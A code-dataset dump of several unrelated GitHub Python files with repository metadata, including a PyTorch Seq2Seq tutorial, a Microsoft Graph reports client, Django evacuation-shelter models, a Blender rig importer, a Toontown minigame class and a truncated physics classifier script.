blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ce2b7d07311d2c3f5b17ab13e8c2c369c6c13a21 | 035e51eadfb4c391a380d4985f2b82716d5dade9 | /4-1.Seq2Seq/Seq2Seq.py | 874048450ccc3eeada3df47afbd7322a4d31e0be | [
"MIT"
] | permissive | bage79/nlp-tutorial | fa07336c6d0d4f28e5036fdf857702633912405b | 801305b9f6d62daa652a3c335009959f0f3d752f | refs/heads/master | 2021-07-05T19:23:39.933479 | 2020-12-11T11:12:26 | 2020-12-11T11:12:26 | 210,335,384 | 3 | 0 | MIT | 2019-09-23T11:13:58 | 2019-09-23T11:13:57 | null | UTF-8 | Python | false | false | 4,312 | py | # %%
# code by Tae Hwan Jung @graykode
import argparse
import numpy as np
import torch
import torch.nn as nn
# S: Symbol that shows starting of decoding input
# E: Symbol that shows starting of decoding output
# P: Symbol that will fill in blank sequence if current batch data size is short than time steps
def make_batch():
    """Build encoder inputs, decoder inputs and targets from the global seq_data.

    Each word pair is padded in place with 'P' up to n_step characters; the
    decoder input gets an 'S' prefix and the target an 'E' suffix.
    Returns (input_batch, output_batch, target_batch): the first two as
    one-hot float tensors, the last as class-index longs.
    """
    enc_batch, dec_batch, tgt_batch = [], [], []
    for pair in seq_data:
        # NOTE: padding intentionally mutates seq_data entries in place,
        # exactly as the original implementation did.
        for slot in range(2):
            pair[slot] = pair[slot] + 'P' * (n_step - len(pair[slot]))
        enc_ids = [num_dic[ch] for ch in pair[0]]
        dec_ids = [num_dic[ch] for ch in ('S' + pair[1])]
        tgt_ids = [num_dic[ch] for ch in (pair[1] + 'E')]
        enc_batch.append(np.eye(n_class)[enc_ids])
        dec_batch.append(np.eye(n_class)[dec_ids])
        tgt_batch.append(tgt_ids)  # kept as indices, not one-hot
    # make tensor
    return torch.FloatTensor(enc_batch), torch.FloatTensor(dec_batch), torch.LongTensor(tgt_batch)
# Model
class Seq2Seq(nn.Module):
    """Minimal RNN encoder-decoder: encode the source sequence, then decode
    conditioned on the encoder's final hidden state."""

    def __init__(self):
        super(Seq2Seq, self).__init__()
        # NOTE: the original passed dropout=0.5 here, but with the default
        # num_layers=1 RNN dropout is a no-op and PyTorch emits a UserWarning,
        # so the inert argument is removed. Behavior is unchanged.
        self.enc_cell = nn.RNN(input_size=n_class, hidden_size=n_hidden)
        self.dec_cell = nn.RNN(input_size=n_class, hidden_size=n_hidden)
        self.fc = nn.Linear(n_hidden, n_class)

    def forward(self, enc_input, enc_hidden, dec_input):
        """Run the encoder then the decoder.

        :param enc_input: [batch_size, n_step, n_class] one-hot source batch
        :param enc_hidden: [num_layers * num_directions, batch_size, n_hidden]
        :param dec_input: [batch_size, n_step + 1, n_class] one-hot decoder input
        :return: logits of shape [n_step + 1, batch_size, n_class]
        """
        # nn.RNN expects time-major input: [seq_len, batch_size, n_class]
        enc_input = enc_input.transpose(0, 1)
        dec_input = dec_input.transpose(0, 1)
        # enc_states : [num_layers(=1) * num_directions(=1), batch_size, n_hidden]
        _, enc_states = self.enc_cell(enc_input, enc_hidden)
        # outputs : [max_len+1(=6), batch_size, num_directions(=1) * n_hidden(=128)]
        outputs, _ = self.dec_cell(dec_input, enc_states)
        model = self.fc(outputs)  # model : [max_len+1(=6), batch_size, n_class]
        return model
if __name__ == '__main__':
    n_step = 5  # maximum word length; shorter words are padded with 'P'
    n_hidden = 128  # RNN hidden state size
    # Vocabulary: special symbols S(tart)/E(nd)/P(ad) plus the lowercase alphabet.
    char_arr = [c for c in 'SEPabcdefghijklmnopqrstuvwxyz']
    num_dic = {n: i for i, n in enumerate(char_arr)}
    # Training pairs: translate each word into its "opposite".
    seq_data = [['man', 'women'], ['black', 'white'], ['king', 'queen'], ['girl', 'boy'], ['up', 'down'], ['high', 'low']]
    n_class = len(num_dic)
    batch_size = len(seq_data)
    model = Seq2Seq()
    criterion = nn.CrossEntropyLoss()
    optimizer = torch.optim.Adam(model.parameters(), lr=0.001)
    input_batch, output_batch, target_batch = make_batch()
    for epoch in range(5000):
        # make hidden shape [num_layers * num_directions, batch_size, n_hidden]
        hidden = torch.zeros(1, batch_size, n_hidden)
        optimizer.zero_grad()
        # input_batch : [batch_size, max_len(=n_step, time step), n_class]
        # output_batch : [batch_size, max_len+1(=n_step, time step) (because of 'S' or 'E'), n_class]
        # target_batch : [batch_size, max_len+1(=n_step, time step)], not one-hot
        output = model(input_batch, hidden, output_batch)
        # output : [max_len+1, batch_size, n_class]
        output = output.transpose(0, 1)  # [batch_size, max_len+1(=6), n_class]
        loss = 0
        # Accumulate per-sample cross-entropy over the whole batch.
        for i in range(0, len(target_batch)):
            # output[i] : [max_len+1, n_class], target_batch[i] : [max_len+1]
            loss += criterion(output[i], target_batch[i])
        if (epoch + 1) % 1000 == 0:
            print('Epoch:', '%04d' % (epoch + 1), 'cost =', '{:.6f}'.format(loss))
        loss.backward()
        optimizer.step()
# Test
def translate(word, args):
input_batch, output_batch, _ = make_batch([[word, 'P' * len(word)]], args)
# make hidden shape [num_layers * num_directions, batch_size, n_hidden]
hidden = torch.zeros(1, 1, args.n_hidden)
output = model(input_batch, hidden, output_batch)
# output : [max_len+1(=6), batch_size(=1), n_class]
predict = output.data.max(2, keepdim=True)[1] # select n_class dimension
decoded = [char_arr[i] for i in predict]
end = decoded.index('E')
translated = ''.join(decoded[:end])
return translated.replace('P', '')
print('test')
print('man ->', translate('man'))
print('mans ->', translate('mans'))
print('king ->', translate('king'))
print('black ->', translate('black'))
print('upp ->', translate('upp')) | [
"nlkey2022@gmail.com"
] | nlkey2022@gmail.com |
d82aacb1766a56a6ec366a413244151cecbedd3f | 6364bb727b623f06f6998941299c49e7fcb1d437 | /msgraph-cli-extensions/src/reports/azext_reports/vendored_sdks/reports/aio/_reports_async.py | 1d9d705411e28f9c5eacf93474eb657f3973b795 | [
"MIT"
] | permissive | kanakanaidu/msgraph-cli | 1d6cd640f4e10f4bdf476d44d12a7c48987b1a97 | b3b87f40148fb691a4c331f523ca91f8a5cc9224 | refs/heads/main | 2022-12-25T08:08:26.716914 | 2020-09-23T14:29:13 | 2020-09-23T14:29:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,260 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Optional, TYPE_CHECKING
from azure.mgmt.core import AsyncARMPipelineClient
from msrest import Deserializer, Serializer
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials_async import AsyncTokenCredential
from ._configuration_async import ReportsConfiguration
from .operations_async import ReportReportRootOperations
from .operations_async import ReportOperations
from .. import models
class Reports(object):
    """Reports.

    Async Microsoft Graph client wrapper (AutoRest-generated style): wires a
    configuration, a pipeline client and (de)serializers, and exposes the
    operation groups as attributes.

    :ivar report_report_root: ReportReportRootOperations operations
    :vartype report_report_root: reports.aio.operations_async.ReportReportRootOperations
    :ivar report: ReportOperations operations
    :vartype report: reports.aio.operations_async.ReportOperations
    :param credential: Credential needed for the client to connect to Azure.
    :type credential: ~azure.core.credentials_async.AsyncTokenCredential
    :param top: Show only the first n items.
    :type top: int
    :param skip: Skip the first n items.
    :type skip: int
    :param search: Search items by search phrases.
    :type search: str
    :param filter: Filter items by property values.
    :type filter: str
    :param count: Include count of items.
    :type count: bool
    :param str base_url: Service URL
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
    """

    def __init__(
        self,
        credential: "AsyncTokenCredential",
        top: Optional[int] = None,
        skip: Optional[int] = None,
        search: Optional[str] = None,
        filter: Optional[str] = None,
        count: Optional[bool] = None,
        base_url: Optional[str] = None,
        **kwargs: Any
    ) -> None:
        # Default to the Microsoft Graph beta endpoint when none is supplied.
        if not base_url:
            base_url = 'https://graph.microsoft.com/beta'
        self._config = ReportsConfiguration(credential, top, skip, search, filter, count, **kwargs)
        self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
        # Map of model class name -> class, used by msrest for (de)serialization.
        client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
        self._serialize = Serializer(client_models)
        self._deserialize = Deserializer(client_models)
        # Operation groups exposed by this client.
        self.report_report_root = ReportReportRootOperations(
            self._client, self._config, self._serialize, self._deserialize)
        self.report = ReportOperations(
            self._client, self._config, self._serialize, self._deserialize)

    async def close(self) -> None:
        # Release the underlying transport resources.
        await self._client.close()

    async def __aenter__(self) -> "Reports":
        await self._client.__aenter__()
        return self

    async def __aexit__(self, *exc_details) -> None:
        await self._client.__aexit__(*exc_details)
| [
"japhethobalak@gmail.com"
] | japhethobalak@gmail.com |
2148a1ec86f693f6250a590af5dd963cab9d67ae | eb4dd92bb28d60b9e967dcf4d3b380a29169774f | /MDRSREID/Settings/parser_args/parser_args.py | 1c60704bbc187c0850cc4ab93193e9a881c82bf0 | [] | no_license | qianqiansbaby/HJL-re-id | b972c441e780fdb83c176405bc644be4a7d48779 | 337de9e06fc43de1388fd719c5dea9d2d71f0df6 | refs/heads/master | 2023-01-10T13:45:02.502919 | 2020-10-15T12:09:52 | 2020-10-15T12:09:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,780 | py | import argparse
def parser_args():
    """Parse the known command-line options for an MVA training run.

    Unknown arguments are ignored (``parse_known_args``), so flags added by
    wrapping tools do not break parsing.

    Recognised options: --model_name, --exp_dir, --default_config_path,
    --ow_config_path, --ow_str.

    :return: the parsed ``argparse.Namespace``
    """
    parser = argparse.ArgumentParser()
    # (flag, default, help) triples -- all options are plain strings.
    string_options = (
        ('--model_name',
         'MDRS',
         '[Optional] Model Name for experiment directory in current directory if exp_dir is None'),
        ('--exp_dir',
         'D:/weights_results/HJL-ReID/MDRS_ADAM_random_erasing_margin_0.3_market_best',
         '[Optional] Directory to store experiment output, '
         'including log files and model checkpoint, etc.'),
        ('--default_config_path',
         'D:/Pycharm_Project/HJL-ReID/MDRSREID/Settings/config/default_config.py',
         'A configuration file.'),
        ('--ow_config_path',
         'D:/Pycharm_Project/HJL-ReID/MDRSREID/Settings/config/overwrite_config/MDRS_config_ADAM_best_market1501.txt',
         '[Optional] A text file, each line being an item to overwrite the cfg_file.'),
        ('--ow_str',
         "cfg.dataset.train.name = 'market1501'",
         """[Optional] Items to overwrite the cfg_file.
                        E.g. "cfg.dataset.train.name = 'market1501''; cfg.model.em_dim = 256" """),
    )
    for flag, default, help_text in string_options:
        parser.add_argument(flag, type=str, default=default, help=help_text)
    known_args, _ = parser.parse_known_args()
    return known_args
| [
"nickhuang1996@126.com"
] | nickhuang1996@126.com |
3cda84b7006d285ed9ce4c722c48031cff326c35 | 31dfdbde18ea2844895e453e5ee4a854d1ec35e9 | /onlinejudge/_implementation/command/split_input.py | c89385542db4cdc82cf728a6486c97e278548a9c | [
"MIT"
] | permissive | uta8a/online-judge-tools | 1d848f91749c4661c71ec527b18ac79a0b1ca419 | d9f1209c4e986a881181476c039f5051cd42d75d | refs/heads/master | 2020-04-27T07:43:16.882820 | 2019-03-04T13:17:35 | 2019-03-04T13:17:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,025 | py | # Python Version: 3.x
import subprocess
import sys
import time
from typing import *
from typing.io import *
import onlinejudge
import onlinejudge._implementation.logging as log
import onlinejudge._implementation.utils as utils
if TYPE_CHECKING:
import argparse
def non_block_read(fh: IO[Any]) -> str:
    """Read whatever is currently available from ``fh`` without blocking.

    Switches the underlying file descriptor to non-blocking mode (POSIX only)
    and returns the available text, or ``''`` when nothing can be read.
    """
    # workaround
    import fcntl
    import os
    fd = fh.fileno()
    fl = fcntl.fcntl(fd, fcntl.F_GETFL)
    fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
    try:
        data = fh.read()
        # A non-blocking read may report "no data" as None instead of raising;
        # normalize that so the annotated return type (str) always holds.
        return data if data is not None else ''
    except Exception:
        # Was a bare ``except:``, which also swallowed KeyboardInterrupt and
        # SystemExit; Exception keeps the intended "no data yet" behavior
        # without hiding process-control exceptions.
        return ''
split_input_auto_footer = ('__AUTO_FOOTER__', )  # this shouldn't be a string, so a tuple

def split_input(args: 'argparse.Namespace') -> None:
    """Split one big input file into per-case files.

    Feeds the input to ``args.command`` line by line and cuts a new case
    whenever the command produces output (detected via a non-blocking read
    after sleeping ``args.time`` seconds). Expects ``args`` to provide:
    input, output (pattern with %i), command, header, footer, ignore, time.
    """
    with open(args.input) as fh:
        inf = fh.read()
    if args.footer == split_input_auto_footer:
        # Auto mode: reuse the file's last line as the footer for every case.
        args.footer = inf.splitlines(keepends=True)[-1]
    with subprocess.Popen(args.command, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=sys.stderr) as proc:
        index = 0
        acc = ''  # lines accumulated for the current case
        for line in inf.splitlines(keepends=True):
            if args.ignore:
                # Skip the first args.ignore lines entirely (e.g. a global header).
                args.ignore -= 1
            else:
                acc += line
                proc.stdin.write(line.encode())
                proc.stdin.flush()
                time.sleep(args.time)  # give the child time to react before polling
                if non_block_read(proc.stdout):  # if output exists
                    index += 1
                    path = utils.percentformat(args.output, {'i': str(index)})
                    log.info('case found: %d', index)
                    if args.header:
                        if args.header == args.header.strip():
                            # Header given without a trailing newline: keep the
                            # case body on its own line.
                            acc = '\n' + acc
                        acc = args.header + acc
                    if args.footer:
                        acc = acc + args.footer
                    log.emit(log.bold(acc))
                    with open(path, 'w') as fh:
                        fh.write(acc)
                    log.success('saved to: %s', path)
                    acc = ''
        while non_block_read(proc.stdout):  # consume all
            pass
| [
"kimiyuki95@gmail.com"
] | kimiyuki95@gmail.com |
de13c219187366afe4cc847fe551db4d7c1b2c32 | 505343f6ace00d22f8753c1a943a5794a619e698 | /katas/Python/6 kyu/Consecutive strings 56a5d994ac971f1ac500003e.py | 1a7200b1a4cf9cbb3c6987b8b4f5039a7fc9099c | [] | no_license | bullet1337/codewars | 7652e50bf768bc47976a9124dd98b93602d4d458 | ba7f13ddd766158b41e036dae5d6b15f7f08761a | refs/heads/master | 2020-03-27T05:04:03.751302 | 2019-04-30T17:45:39 | 2019-04-30T17:45:39 | 145,991,995 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 349 | py | # https://www.codewars.com/kata/56a5d994ac971f1ac500003e
def longest_consec(strarr, k):
    """Return the longest string formed by joining k consecutive entries.

    On ties the earliest window wins. Returns '' when the array is empty or
    k is outside 1..len(strarr).
    """
    n = len(strarr)
    if n == 0 or not 0 < k <= n:
        return ''
    windows = (''.join(strarr[i:i + k]) for i in range(n - k + 1))
    # max() keeps the first maximal element, matching the original's
    # strict "longer than" replacement rule.
    return max(windows, key=len)
| [
"alichek95@mail.ru"
] | alichek95@mail.ru |
a4f3c184786b0f88401bb53010992e6b905798c5 | 5cf71ff8714bf0568394717c6176f371f929555d | /mizql/evacuation/models.py | e0176faf3d9cd45055e5c14d034afab27c9b873e | [
"MIT"
] | permissive | StudioAquatan/mizql | 66a9b1a8117dcb1f8dd86c94bb8632e076eb7996 | 340e44266a97dda846fbc17ce0edf85cee586f51 | refs/heads/master | 2020-04-04T13:12:54.361363 | 2018-11-11T06:20:15 | 2018-11-11T06:20:15 | 155,953,069 | 0 | 0 | MIT | 2020-03-15T09:21:09 | 2018-11-03T05:23:07 | JavaScript | UTF-8 | Python | false | false | 4,607 | py | from django.db import models
from django.contrib.auth import get_user_model
from django.db.models.expressions import RawSQL
from django.utils import timezone
class NearbyShelterManager(models.Manager):
    """Manager that annotates Shelter querysets with a great-circle distance."""

    def with_distance(self, lat: float, lon: float):
        """Annotate the Shelter queryset with a ``distance`` column (kilometres).

        :param lat: latitude of the reference point
        :param lon: longitude of the reference point
        :return: queryset annotated with ``distance``
        """
        raw_queryset = self.get_queryset()
        # Spherical-law-of-cosines distance in km (6371 = Earth radius in km),
        # computed in SQL; the reference point is passed as bound parameters,
        # so no SQL injection is possible here.
        query = """
        6371 * acos(
        cos(radians(%s)) * cos(radians(lat)) * cos(radians(lon) - radians(%s))
        + sin(radians(%s)) * sin(radians(lat))
        )
        """
        # Annotate the computed distance column onto each row.
        queryset = raw_queryset.annotate(distance=RawSQL(query, (lat, lon, lat)))
        return queryset

    def get_nearby_shelters_list(self, lat: float, lon: float, distance: int):
        """Return shelters within the given radius of one's own position.

        :param lat: own latitude
        :param lon: own longitude
        :param distance: search radius in metres
        :return: queryset
        """
        queryset = self.with_distance(lat, lon)
        # Convert metres to kilometres to match the annotated column's unit.
        distance = distance / 1000
        # Filter on the annotated distance.
        return queryset.filter(distance__lte=distance)
class Shelter(models.Model):
    """An evacuation shelter: name, address, coordinates and capacity."""
    name = models.CharField(verbose_name='名前', max_length=255)
    address = models.CharField(verbose_name='住所', max_length=255)
    lat = models.FloatField(verbose_name='緯度')  # latitude
    lon = models.FloatField(verbose_name='経度')  # longitude
    capacity = models.IntegerField('収容可能人数', null=True)  # maximum occupancy; may be unknown
    # Custom manager providing distance annotation/filtering.
    objects = NearbyShelterManager()

    class Meta:
        # No two shelters may share the exact same coordinates.
        unique_together = ('lat', 'lon')
        ordering = ['name']

    def __str__(self):
        return self.name
class PersonalEvacuationHistory(models.Model):
    """One row per user evacuation event: arriving at or leaving a shelter."""
    user = models.ForeignKey(get_user_model(), verbose_name='ユーザ', on_delete=models.CASCADE,
                             related_name='evacuation_histories')
    shelter = models.ForeignKey(Shelter, verbose_name='避難所', on_delete=models.CASCADE,
                                related_name='personal_histories')
    created_at = models.DateTimeField('日付')
    # True when the user arrived at the shelter, False when they went home.
    is_evacuated = models.BooleanField(verbose_name='避難しているか')

    class Meta:
        ordering = ['-created_at']
class EvacuationHistoryManager(models.Manager):
    def create(self, shelter: Shelter, now=None):
        """Snapshot the current number of evacuees at ``shelter``.

        Counts arrivals and departures recorded since the previous snapshot
        and stores the running total as a new EvacuationHistory row.
        (The original Japanese docstring said "from 10 minutes ago to now",
        but the code actually measures from the last recorded history time.)

        :param shelter: shelter to snapshot
        :param now: reference time; defaults to ``timezone.now()``
        :return: the saved EvacuationHistory instance
        """
        if now is None:
            now = timezone.now()
        latest_date = now
        latest_count = 0
        # Carry the running count over from the most recent aggregate snapshot.
        personal_histories = PersonalEvacuationHistory.objects.filter(shelter=shelter)
        latest_history = EvacuationHistory.objects.filter(shelter=shelter).order_by('-created_at').first()
        if latest_history is not None:
            latest_count = latest_history.count
            latest_date = latest_history.created_at
        else:
            # No snapshot yet: start counting from the earliest window that
            # still includes the most recent personal event.
            last_history = personal_histories.order_by('-created_at').first()
            if last_history is not None:
                latest_date = last_history.created_at
        # Personal events recorded since the previous snapshot.
        personal_histories = personal_histories.filter(created_at__range=[latest_date, now])
        # Number of people who arrived at the shelter.
        at_shelter_count = personal_histories.filter(is_evacuated=True).count()
        # Number of people who went home.
        at_home_count = personal_histories.filter(is_evacuated=False).count()
        # People currently at the shelter.
        current_count = latest_count + at_shelter_count - at_home_count
        hist = self.model(shelter=shelter, count=current_count, created_at=now)
        hist.save()
        return hist
class EvacuationHistory(models.Model):
    """Aggregated head-count snapshot for a shelter at a point in time."""
    shelter = models.ForeignKey(Shelter, verbose_name='避難所', related_name='histories', on_delete=models.CASCADE)
    count = models.IntegerField('避難している人数')  # people at the shelter at created_at
    is_demo = models.BooleanField('デモ用', default=True)  # flags demo data
    created_at = models.DateTimeField('取得日')
    # Manager with the create() override that computes the running count.
    objects = EvacuationHistoryManager()

    class Meta:
        ordering = ['-created_at']
| [
"s.kokuryo@gmail.com"
] | s.kokuryo@gmail.com |
4b4f8b16ed3a3451ce853106c6e8934456e04fb6 | 13c2639490aa8cc3ecf891ae3422f0e105dd886e | /order/migrations/0002_auto_20210317_0002.py | f7c72217f08e89a7ab5b6c86813708d6998f5039 | [] | no_license | maratovision/rest_api | d32fdfc8d5d8968d2c8ef77aaed05b25d6fa26a0 | b734f3cf1c626f4043dbaa0fa7a6f41ebf9cdcae | refs/heads/main | 2023-04-08T12:54:40.736337 | 2021-04-08T20:24:15 | 2021-04-08T20:24:15 | 356,038,311 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 877 | py | # Generated by Django 3.1.7 on 2021-03-16 18:02
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated by Django makemigrations; do not hand-edit the operations
    # below -- create a follow-up migration instead.

    dependencies = [
        ('order', '0001_initial'),
    ]

    operations = [
        # Adds the Table model: an area label plus a Reserved/Empty status.
        migrations.CreateModel(
            name='Table',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('area', models.CharField(max_length=10)),
                ('status', models.CharField(choices=[('Reserved', 'Reserved'), ('Empty', 'Empty')], default='Empty', max_length=20)),
            ],
        ),
        # Repoints Order.table at the new Table model (nullable FK, cascade delete).
        migrations.AlterField(
            model_name='order',
            name='table',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='order.table'),
        ),
    ]
| [
"maratovision@gmail.com"
] | maratovision@gmail.com |
aa8ca750eff2dc9bc48404571caa906b5e430e8d | ca259c70bd7e565fa45cf7e9597251e7bbd8f240 | /menus/Lighting/ImportRig.py | 8d7f775e12661b27003fe7a168840d311f8ef2ba | [] | no_license | gmolinart/blender_pipeline | 6ecd01e8efa02a2b9b8f68ece3e82a35d899c73c | 1a01d78a697c3fc70e6410b46b5138405d4b542c | refs/heads/master | 2023-04-10T04:17:44.349286 | 2021-04-20T11:14:26 | 2021-04-20T11:14:26 | 304,119,928 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,490 | py | import bpy
# from cgl.plugins.blender import Alchemy as lm
class ImportRig(bpy.types.Operator):
    """
    This class is required to register a button in blender.
    """
    bl_idname = 'object.import_rig'
    bl_label = 'Import Rig'

    @classmethod
    def poll(cls, context):
        # Operator is only available while some object is active in the scene.
        return context.active_object is not None

    def execute(self, context):
        # Delegate the actual work to the module-level run() helper.
        run()
        return {'FINISHED'}
import bpy
def import_selected_rig():
    """Realize the duplicates of the selected proxy/rig's base object.

    Derives the base object name by stripping the '_proxy'/'_rig' suffix from
    the active object's name, realizes its duplicates, and returns a tuple
    (imported_rig_name, action_name). Implicitly returns None when the rig
    has no animation data -- callers must handle that case.

    NOTE(review): if the active object's name contains neither 'proxy' nor
    'rig', ``object_name`` is never assigned and this raises NameError;
    presumably the operator is only invoked on such objects -- confirm.
    """
    rig = bpy.context.object
    if 'proxy' in rig.name:
        object_name = rig.name.replace('_proxy', '')
    elif 'rig' in rig.name:
        object_name = rig.name.replace('_rig', '')
    object = bpy.data.objects[object_name]
    action = rig.animation_data
    if not action:
        print('NO ANIMATION')
        object.animation_data_create()
        return
    else:
        action = rig.animation_data.action.name
    # Move the selection to the base object before realizing duplicates.
    rig.select_set(False)
    object.select_set(True)
    # NOTE(review): duplicates_make_real acts on the current selection --
    # presumably the base object is the duplicator carrying the rig; confirm.
    bpy.ops.object.duplicates_make_real()
    imported_rig_name = '{}_rig'.format(object_name)
    return (imported_rig_name, action)
def link_animation(object, action):
    """Attach the action named ``action`` to the object named ``object``."""
    imported_rig = bpy.data.objects[object]
    action = bpy.data.actions[action]
    # Ensure the object has an animation data block before assigning.
    imported_rig.animation_data_create()
    imported_rig.animation_data.action = action
def run():
    """Import the rig for the selected proxy/rig object and relink its action.

    Fixes the original, which unpacked import_selected_rig()'s result without
    guarding against the None returned when the rig has no animation data
    (a TypeError at runtime), and which called link_animation() twice in a
    row with identical arguments.
    """
    result = import_selected_rig()
    if result is None:
        # Source rig has no animation; nothing to relink.
        return
    object, action = result
    print(object, action)
    link_animation(object, action)
# link_animation('MILVIO_rig', 'MILVIO_proxyAction') | [
"gmolinart@gmail.com"
] | gmolinart@gmail.com |
7daec122740e4dd33b266b8e1ae3a1bb2cf663de | a857d1911a118b8aa62ffeaa8f154c8325cdc939 | /toontown/minigame/DivingTreasure.py | fbb219a4caf3e31d142fc374c0c2f6bb0918ff6b | [
"MIT"
] | permissive | DioExtreme/TT-CL-Edition | 761d3463c829ec51f6bd2818a28b667c670c44b6 | 6b85ca8352a57e11f89337e1c381754d45af02ea | refs/heads/main | 2023-06-01T16:37:49.924935 | 2021-06-24T02:25:22 | 2021-06-24T02:25:22 | 379,310,849 | 0 | 0 | MIT | 2021-06-22T15:07:31 | 2021-06-22T15:07:30 | null | UTF-8 | Python | false | false | 1,336 | py | from direct.showbase.DirectObject import DirectObject
from toontown.toonbase.ToontownGlobals import *
from direct.directnotify import DirectNotifyGlobal
from direct.interval.IntervalGlobal import *
import DivingGameGlobals
class DivingTreasure(DirectObject):
    """A treasure chest prop for the diving minigame: visible model plus an
    intangible collision sphere used to detect grabs."""

    def __init__(self, i):
        # Root node for the whole prop; scaled down and positioned on the
        # sea floor according to the chest index.
        self.treasureNode = render.attachNewNode('treasure')
        loadBase = 'phase_4/models/minigames/'
        self.chest = loader.loadModel(loadBase + 'treasure.bam')
        self.chest.reparentTo(self.treasureNode)
        self.chest.setPos(0, 0, -25)
        self.chest.setScale(1, 0.7, 1)
        self.chestId = i
        self.grabbedId = 0  # avId of the toon holding this chest (0 = free)
        # Placeholder interval; replaced when the chest is animated elsewhere.
        self.moveLerp = Sequence()
        self.treasureNode.setScale(0.04)
        # Chests are laid out 10 units apart along the X axis.
        self.treasureNode.setPos(-15 + 10.0 * i, 0.25, -36.0)
        # Intangible sphere: avatars pass through it but still trigger
        # into-collision events for grabbing.
        cSphere = CollisionSphere(0.0, 0.0, 0.0, 45)
        cSphere.setTangible(0)
        name = str(i)  # collision node is named by chest index for event lookup
        cSphereNode = CollisionNode(name)
        cSphereNode.setIntoCollideMask(DivingGameGlobals.CollideMask)
        cSphereNode.addSolid(cSphere)
        self.chestNode = cSphereNode
        self.chestCNP = self.treasureNode.attachNewNode(cSphereNode)

    def destroy(self):
        """Tear down event hooks, running intervals and scene-graph nodes."""
        self.ignoreAll()
        del self.chest
        self.moveLerp.finish()
        del self.moveLerp
        self.treasureNode.removeNode()
        del self.treasureNode
| [
"devinhall4@gmail.com"
] | devinhall4@gmail.com |
7fb4bde6fd28390cdae70c8247ed6a32b2200435 | a4da4b0bee0a6ff500283964f506b578de3701c6 | /mva/scripts/dnn_resweights.py | 0a023e653d56d116acf1b45904cba9b5fafd4fea | [] | no_license | kondratyevd/H2MuPurdue | 4ac012562c02acad6751a1e1ecb6fa1c46d832f5 | 2c0632ecf083840743ee6d652bb31e4ddde101e2 | refs/heads/master | 2020-05-14T19:16:46.489982 | 2019-08-25T21:03:17 | 2019-08-25T21:03:17 | 181,926,372 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,051 | py | import os, sys
sys.path.append( os.path.dirname( os.path.dirname( os.path.abspath(__file__) ) ) )
import argparse
from classifier import Framework
from samples.ntuples import *
parser = argparse.ArgumentParser(description='')
parser.add_argument('--out_path', action='store', dest='output_path', help='Output path')
args = parser.parse_args()
c = Framework(outPath=args.output_path)
c.label = "dnn_resweights"
comment = "DNN UCSD resweights"
# change this line for each run
c.add_comment(comment)
print comment
treePath = 'tree'
c.set_tree_path(treePath)
c.set_year("ucsd_inclusive")
c.massWindow = [120,130]
c.multiclass = True
c.dy_label = "DY"
c.top_label = "ttbar"
c.ggh_label = "ggH"
c.vbf_label = "VBF"
##################### Input samples #######################
c.add_category(c.ggh_label, True)
c.add_file_to_category(ucsd_ggh_2016.name, ucsd_ggh_2016.path, ucsd_ggh_2016.xSec, c.ggh_label, False)
c.add_file_to_category(ucsd_ggh_2017.name, ucsd_ggh_2017.path, ucsd_ggh_2017.xSec, c.ggh_label, False)
c.add_file_to_category(ucsd_ggh_2018.name, ucsd_ggh_2018.path, ucsd_ggh_2018.xSec, c.ggh_label, False)
c.add_category(c.vbf_label, True)
c.add_file_to_category(ucsd_vbf_2016.name, ucsd_vbf_2016.path, ucsd_vbf_2016.xSec, c.vbf_label, False)
c.add_file_to_category(ucsd_vbf_2017.name, ucsd_vbf_2017.path, ucsd_vbf_2017.xSec, c.vbf_label, False)
c.add_file_to_category(ucsd_vbf_2018.name, ucsd_vbf_2018.path, ucsd_vbf_2018.xSec, c.vbf_label, False)
c.add_category(c.dy_label, False)
c.add_file_to_category(ucsd_dy_2016.name, ucsd_dy_2016.path, ucsd_dy_2016.xSec, c.dy_label, False)
c.add_file_to_category(ucsd_dy_2017.name, ucsd_dy_2017.path, ucsd_dy_2017.xSec, c.dy_label, False)
